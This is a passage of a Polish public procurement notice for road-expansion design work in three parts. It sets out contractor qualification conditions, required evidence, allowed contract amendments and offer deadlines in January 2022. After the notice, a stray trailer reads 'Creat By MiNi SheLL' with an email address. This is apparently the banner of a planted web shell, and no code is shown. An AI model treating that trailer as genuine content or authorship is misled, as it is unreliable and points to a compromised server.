udziału w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4)	zdolności technicznej lub zawodowej dla każdej z części:<br/>Wykonawca spełni warunek, jeżeli wykaże że:<br/>a)	wykonał w ciągu ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej dwie usługi polegające na opracowaniu dokumentacji projektowej dla rozbudowy skrzyżowania lub dla rozbudowy drogi klasy min. G o długości minimum 300 m <br/>i wartości minimum dla każdej usługi: <br/>zadania 1 – 120 000,00 zł brutto dla każdej z usług;<br/>zadania 2 - 120 000,00 zł brutto dla każdej z usług;<br/>zadania 3 - 120 000,00 zł brutto dla każdej z usług;<br/><br/><br/>b)	dysponuje osobami zdolnymi do wykonania Zamówienia, tj. osobami posiadającymi poniższe doświadczenie: <br/>dla każdej z 3 części:<br/>- 1 projektant z uprawnieniami w specjalności drogowej - opracował co najmniej 2 projekty budowlane dla rozbudowy skrzyżowania lub dla rozbudowy drogi klasy min. G o długości minimum 300 m dla każdej z usług; <br/>- 1 projektant sprawdzający z uprawnieniami w specjalności drogowej – opracował/sprawdził co najmniej 2 projekty budowlane dla rozbudowy skrzyżowania lub rozbudowy drogi klasy min. G o długości minimum 300 m dla każdej z usług;	<br/><br/>Dla każdej części zamówienia wymagania dotyczące doświadczenia personelu są takie same.<br/><br/>3.	Wykonawca składający ofertę musi wykazać się całym wymaganym doświadczeniem, <br/>a w przypadku oferty złożonej przez konsorcjum jeden z uczestników konsorcjum musi wykazać się całym wymaganym doświadczeniem (warunek nie będzie spełniony, jeżeli wszyscy uczestnicy konsorcjum w sumie wykażą się wymaganym doświadczeniem, ale żaden z nich indywidualnie nie wykaże się całym wymaganym doświadczeniem wskazanym w pkt VII 2.4a) SWZ). Jeżeli Wykonawca w celu potwierdzenia spełniania niniejszego warunku udziału w postępowaniu polegać będzie na doświadczeniu innego podmiotu, musi on wykazać się całym wymaganym doświadczeniem wskazanym w pkt VII 2.4a) SWZ.<br/>4.	Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności zawodowej dotyczącego dysponowania osobami zdolnymi do wykonania Zamówienia – dopuszcza łączne spełnianie warunku przez Wykonawców – dotyczy rozdziału VIII pkt 2. 4) b).<br/>5.	Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, <br/>w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy <br/>w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/>6.	W przypadku, gdy złożone przez Wykonawcę dokumenty, oświadczenia dotyczące warunków udziału w postępowaniu zawierają dane/informacje w innych walutach niż złoty polski Zamawiający, jako kurs przeliczeniowy waluty przyjmie kurs NBP z dnia publikacji ogłoszenia o zmówieniu w BZP. Jeżeli w dniu publikacji ogłoszenia nie będzie publikowany średni kurs walut przez NBP, Zamawiający przyjmie kurs przeliczeniowy <br/>z ostatniej opublikowanej tabeli kursów NBP przed dniem publikacji ogłoszenia <br/>o zamówieniu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również<br/>wykonywanych, w okresie ostatnich 5 lat przed upływem terminu składania ofert albo wniosków o<br/>dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi<br/>zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są<br/>wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane,<br/>a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z<br/>przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie<br/>wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje<br/>bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie<br/>ostatnich 3 miesięcy;<br/>4) Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego,<br/>w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia<br/>publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o<br/>braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o<br/>ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076), z innym wykonawcą, który złożył<br/>odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w<br/>postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej<br/>2) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji<br/>i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie<br/>wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub<br/>ewidencji;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenia, o których mowa w Rozdziale IX ust. 1 SWZ, składa każdy z wykonawców.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zgodnie z art. 455 ust 1 ustawy Pzp Zamawiający dopuszcza możliwość wprowadzenia zmian<br/>w umowie, na mocy porozumienia stron w następujących przypadkach i na następujących<br/>warunkach:.<br/>a) Zmiana terminu realizacji przedmiotu umowy, gdy nastąpią:<br/>- siła wyższa uniemożliwiająca wykonanie usługi – o czas, w którym z powodu wystąpienia siły<br/>wyższej umowa nie mogła być realizowana; za siłę wyższą uważa się w szczególności klęski<br/>żywiołowe, działania wojenne, zamieszki, akty o charakterze terrorystycznym – o czas niezbędny<br/>do wykonania umowy w sposób należyty<br/>- zmiany będące następstwem okoliczności leżących po stronie Zamawiającego,<br/>w szczególności: wstrzymanie realizacji umowy przez Zamawiającego – o czas niezbędny do<br/>wykonania umowy w sposób należyty<br/>- zmiany będące następstwem działania podmiotów trzecich – o czas niezbędny do wykonania<br/>umowy w sposób należyty;<br/>b) Zmiany osobowe<br/>- zmiana osób realizujących przedmiot umowy na inne, spełniające wymagania dotyczące<br/>doświadczenia personelu wskazane w warunkach udziału w postępowaniu,<br/>- zmiana osób koordynujących wykonanie umowy;<br/>c) Zmiany organizacji spełniania świadczenia w zakresie:<br/>- konieczności zaspokojenia roszczeń lub oczekiwań podmiotów trzecich nieartykułowanych lub<br/>niemożliwych do jednoznacznego określenia w chwili zawierania umowy – o czas niezbędny do<br/>wykonania umowy w sposób należyty;<br/>d) Płatności<br/>- zmiany terminów płatności wynikające z wszelkich zmian wprowadzanych do umowy.<br/>e) Pozostałe okoliczności powodujące możliwość zmiany umowy:<br/>- zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy na skutek<br/>zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych<br/>dotyczących realizacji projektu;<br/>- rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy.<br/>W takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy<br/>czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty,<br/>które Wykonawca poniósł w związku z wynikającymi<br/>z umowy planowanymi świadczeniami; minimalne wynagrodzenie Wykonawcy z tytułu<br/>wykonania umowy nie będzie niższe niż 50 % wynagrodzenia umownego niezależnie od<br/>zakresu ograniczenia wykonania zamówienia przez Zamawiającego.<br/>- wydłużenie okresu gwarancji lub rękojmi, z powodu zmian wprowadzonych do umowy (np.<br/>termin realizacji umowy).<br/>2. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może<br/>wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody zarówno<br/>przez Zamawiającego jak i przez Wykonawcę.<br/>3. Wszelkie zmiany i uzupełnienia treści Umowy mogą być dokonywane wyłącznie w formie<br/>aneksu podpisanego przez Strony. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-01-10 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/mzdw</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-01-10 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-02-08</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com